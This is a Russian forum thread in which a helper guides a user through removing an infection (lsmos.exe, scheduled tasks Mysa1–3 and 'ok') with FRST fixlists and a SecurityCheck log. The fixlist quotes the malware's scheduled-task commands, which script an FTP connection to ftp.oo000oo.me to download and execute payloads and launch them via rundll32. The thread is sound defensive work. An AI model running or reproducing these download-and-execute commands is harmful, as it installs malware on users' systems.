Rusimba Опубликовано 16 ноября, 2017 Опубликовано 16 ноября, 2017 Здравствуйте!Комп начал очень сильно тупить, в диспетчере обнаружил процесс lsmos.exe, в планировщике висит Mysa1, Mysa2, Mysa3 и ok. Прочитал что это вирус. Завершаешь этот процесс и все работает нормально. В интернете рекомендаций не много по лечению, все что делалне помогает, после перезагрузки все снова появляется. Вот вся пачка болячек которые обнаружил:lsmosee (C:\Windows\Help\lsmosee.exe) - был удален после проверки Kaspersky Virus Removal Tool;Mysa 1 (C:\Windows\System32\Tasks\Mysa1)Mysa 2 (C:\Windows\System32\Tasks\Mysa2)Mysa 3 (C:\Windows\System32\Tasks\Mysa3)ok (C:\Windows\System32\Tasks\ok)lsmos (C:\Windows\System32\lsmos.exe)Помогите пожалуйста вылечить! CollectionLog-2017.11.16-20.32.zip
thyrex Опубликовано 16 ноября, 2017 Опубликовано 16 ноября, 2017 Скачайте Farbar Recovery Scan Tool и сохраните на Рабочем столе. Примечание: необходимо выбрать версию, совместимую с Вашей операционной системой. Если Вы не уверены, какая версия подойдет для Вашей системы, скачайте обе и попробуйте запустить. Только одна из них запустится на Вашей системе.1. Запустите программу двойным щелчком. Когда программа запустится, нажмите Yes для соглашения с предупреждением. 2. Убедитесь, что в окне Optional Scan отмечены List BCD, Driver MD5 и 90 Days Files. 3. Нажмите кнопку Scan. 4. После окончания сканирования будет создан отчет (FRST.txt) в той же папке, откуда была запущена программа. 5. Если программа была запущена в первый раз, также будет создан отчет (Addition.txt). 6. Отчеты, полученные в пп. 4 и 5, заархивируйте (в один архив) и прикрепите к сообщению. 1
thyrex Опубликовано 16 ноября, 2017 Опубликовано 16 ноября, 2017 1. Откройте Блокнот и скопируйте в него приведенный ниже текст CreateRestorePoint: 2017-11-16 14:52 - 2017-11-16 14:52 - 007052800 _____ C:\Windows\system32\lsmos.exe AlternateDataStreams: C:\ProgramData\TEMP:41ADDB8A [152] AlternateDataStreams: C:\ProgramData\TEMP:A064CECC [144] AlternateDataStreams: C:\Users\Все пользователи\TEMP:41ADDB8A [152] AlternateDataStreams: C:\Users\Все пользователи\TEMP:A064CECC [144] Task: {E6B8DE63-64F7-496A-A07C-E88A74080CAF} - System32\Tasks\Mysa3 => cmd /c echo open ftp.oo000oo.me>ps&echo test>>ps&echo 1433>>ps&echo get s.rar c:\windows\help\lsmosee.exe>>ps&echo bye>>ps&ftp -s:ps&c:\windows\help\lsmosee.exe <==== ATTENTION c:\windows\help\lsmosee.exe Task: {BB57992A-E50B-448A-92D3-617CF831BCED} - System32\Tasks\Mysa2 => cmd /c echo open ftp.oo000oo.me>p&echo test>>p&echo 1433>>p&echo get s.dat c:\windows\debug\item.dat>>p&echo bye>>p&ftp -s:p <==== ATTENTION c:\windows\debug\item.dat Task: {E74DDD5D-25CE-4ABF-9B93-8799ABD66E13} - System32\Tasks\Mysa1 => rundll32.exe c:\windows\debug\item.dat,ServiceMain aaaa <==== ATTENTION Reboot: 2. Нажмите Файл – Сохранить как3. Выберите папку, откуда была запущена утилита Farbar Recovery Scan Tool 4. Укажите Тип файла – Все файлы (*.*) 5. Введите имя файла fixlist.txt и нажмите кнопку Сохранить 6. Запустите FRST, нажмите один раз на кнопку Fix и подождите. Программа создаст лог-файл (Fixlog.txt). Пожалуйста, прикрепите его в следующем сообщении. Обратите внимание, что будет выполнена перезагрузка компьютера. 1
Rusimba Опубликовано 16 ноября, 2017 Автор Опубликовано 16 ноября, 2017 Готово. После перезагрузки: lsmos.exe в процессах нет. lsmosee (C:\Windows\Help\lsmosee.exe) - нетMysa 1 (C:\Windows\System32\Tasks\Mysa1) - нетMysa 2 (C:\Windows\System32\Tasks\Mysa2) - нетMysa 3 (C:\Windows\System32\Tasks\Mysa3) - нетok (C:\Windows\System32\Tasks\ok) - остался!lsmos (C:\Windows\System32\lsmos.exe) - нет Fixlog.txt
thyrex Опубликовано 16 ноября, 2017 Опубликовано 16 ноября, 2017 1. Откройте Блокнот и скопируйте в него приведенный ниже текст CreateRestorePoint: Task: {D06961F2-B3D2-445F-A85C-B190E584E8F3} - System32\Tasks\ok => rundll32.exe c:\windows\debug\ok.dat,ServiceMain aaaa c:\windows\debug\ok.dat Reboot: 2. Нажмите Файл – Сохранить как3. Выберите папку, откуда была запущена утилита Farbar Recovery Scan Tool 4. Укажите Тип файла – Все файлы (*.*) 5. Введите имя файла fixlist.txt и нажмите кнопку Сохранить 6. Запустите FRST, нажмите один раз на кнопку Fix и подождите. Программа создаст лог-файл (Fixlog.txt). Пожалуйста, прикрепите его в следующем сообщении. Обратите внимание, что будет выполнена перезагрузка компьютера. 1
Rusimba Опубликовано 16 ноября, 2017 Автор Опубликовано 16 ноября, 2017 Ну вроде все чисто Спасибо! Подскажите, необходимо сделать что-либо еще дополнительно? Fixlog.txt
thyrex Опубликовано 16 ноября, 2017 Опубликовано 16 ноября, 2017 Загрузите SecurityCheck by glax24 & Severnyj и сохраните утилиту на Рабочем столе. Запустите двойным щелчком мыши (если Вы используете Windows XP) или из меню по щелчку правой кнопки мыши Запустить от имени администратора (если Вы используете Windows Vista/7/8/10); Если увидите предупреждение от вашего фаервола относительно программы SecurityCheck, не блокируйте ее работу; Дождитесь окончания сканирования, откроется лог в блокноте с именем SecurityCheck.txt; Если Вы закрыли Блокнот, то найти этот файл можно в корне системного диска в папке с именем SecurityCheck, например C:\SecurityCheck\SecurityCheck.txt; Процитируйте содержимое файла в своем следующем сообщении. 1
Rusimba Опубликовано 16 ноября, 2017 Автор Опубликовано 16 ноября, 2017 SecurityCheck by glax24 & Severnyj v.1.4.0.53 [27.10.17]WebSite: www.safezone.ccDateLog: 16.11.2017 23:24:23Path starting: C:\Users\zimba\AppData\Local\Temp\SecurityCheck\SecurityCheck.exeLog directory: C:\SecurityCheck\IsAdmin: TrueUser: zimbaVersionXML: 4.75is-13.11.2017___________________________________________________________________________Windows 7(6.1.7601) Service Pack 1 (x86) Professional Lang: Russian(0419)Дата установки ОС: 23.01.2017 12:26:02Статус лицензии: Windows® 7, Professional edition Постоянная активация прошла успешно.Режим загрузки: NormalБраузер по умолчанию: D:\Программы\Firefox\firefox.exeСистемный диск: C: ФС: [NTFS] Емкость: [100.4 Гб] Занято: [39.8 Гб] Свободно: [60.6 Гб]------------------------------- [ Windows ] -------------------------------Internet Explorer 11.0.9600.18837 [+]Контроль учётных записей пользователя отключен (Уровень 1)^Рекомендуется включить уровень по умолчанию: Win+R ввести UserAccountControlSettings и Enter^Загружать автоматически обновления и устанавливать по заданному расписаниюДата установки обновлений: 2017-11-16 18:17:24Центр обновления Windows (wuauserv) - Служба работаетЦентр обеспечения безопасности (wscsvc) - Служба работаетУдаленный реестр (RemoteRegistry) - Служба остановленаОбнаружение SSDP (SSDPSRV) - Служба работаетСлужбы удаленных рабочих столов (TermService) - Служба остановленаСлужба удаленного управления Windows (WS-Management) (WinRM) - Служба остановлена------------------------------ [ MS Office ] ------------------------------Microsoft Office 2010 x86 v.14.0.7015.1000--------------------------- [ FirewallWindows ] ---------------------------Брандмауэр Windows (MpsSvc) - Служба работает--------------------------- [ AntiSpyware_WMI ] ---------------------------Windows Defender (включен и обновлен)--------------------------- [ OtherUtilities ] ----------------------------7-Zip 16.04 v.16.04TeamViewer 12 v.12.0.83369 Внимание! Скачать обновленияTeamViewer 12 (TeamViewer) - Служба работает--------------------------------- [ IM ] ----------------------------------Skype™ 7.31 v.7.31.104 Внимание! Скачать обновления--------------------------------- [ P2P ] ---------------------------------µTorrent 3.4.9 Внимание! Клиент сети P2P! Может содержать рекламные модули или использоваться для скачивания нежелательного контента.--------------------------- [ AppleProduction ] ---------------------------iTunes v.12.6.1.25 Внимание! Скачать обновления^Для проверки новой версии используйте приложение Apple Software Update^Bonjour v.3.1.0.1Служба Bonjour (Bonjour Service) - Служба остановлена--------------------------- [ AdobeProduction ] ---------------------------Adobe Flash Player 27 ActiveX v.27.0.0.183Adobe Flash Player 27 NPAPI v.27.0.0.183Adobe Flash Player 27 PPAPI v.27.0.0.183Adobe Acrobat Reader DC - Russian v.18.009.20044 [+]------------------------------- [ Browser ] -------------------------------Mozilla Firefox 57.0 (x86 ru) v.57.0 [+]--------------------------- [ RunningProcess ] ----------------------------D:\Программы\Firefox\firefox.exe v.57.0.0.6525------------------ [ AntivirusFirewallProcessServices ] -------------------Защитник Windows (WinDefend) - Служба работает----------------------------- [ End of Log ] ------------------------------
thyrex Опубликовано 16 ноября, 2017 Опубликовано 16 ноября, 2017 Выполните рекомендованное и на этом закончим 1
Рекомендуемые сообщения
Пожалуйста, войдите, чтобы комментировать
Вы сможете оставить комментарий после входа в
Войти